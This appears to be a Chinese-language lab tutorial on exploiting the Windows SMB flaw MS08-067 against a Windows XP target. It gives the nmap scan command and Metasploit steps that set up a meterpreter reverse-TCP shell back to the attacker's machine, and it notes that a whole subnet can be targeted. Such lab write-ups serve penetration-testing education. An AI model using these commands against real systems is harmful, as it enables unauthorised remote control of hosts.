MS-08-067 windows smb服務 遠端命令執行漏洞
阿新 • • 發佈:2022-03-29
漏洞概要
MS-08-067是Windows平臺中smb
服務445埠的遠端程式碼執行漏洞
利用成功可以遠端控制主機
影響範圍為:windows2000、xp、server 2003、server 2008、甚至早些版本的Win7
實驗場景
攻擊機:kali2022
msfconsole利用
靶機:windows xp
漏洞利用
使用ifconfig
和ipconfig
獲取攻擊機和靶機的IP地址
攻擊機IP:172.16.1.117
靶機IP:172.16.1.116
nmap的預設指令碼在/usr/share/nmap/scripts
,ls -l| grep 08-67
篩選漏洞相關模組
使用nmap
的漏洞掃描指令碼smb-vuln-ms08-067
ms-08-067
漏洞
nmap -script smb-vuln-ms08-067 -p 445 172.16.1.116 -n
發現存在漏洞,使用msfconsole
進行利用
msfconsole啟動漏洞平臺
查詢漏洞利用指令碼
search ms08_067
使用漏洞利用模組,並使用show options
檢視漏洞利用模組配置引數
use exploit/windows/smb/ms08_067_netapi
show options
Required
為yes
是必須要設定的引數
在最新版kali
中,對常見的漏洞自動選擇了合適的payload,例如這裡的windows/meterpreter/reverse_tcp
反彈會話的IP地址和埠
就是我們本機的IP和埠
如果不是這個
payload
需要我們手動設定
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.117
set LPORT 4444
觀察我們必須設定目標的IP地址,就是RHOSTS
,這裡如果是RHOST
是隻可以設定一個IP地址,如果是RHOSTS
則可以設定一個網段,對一個網段進行攻擊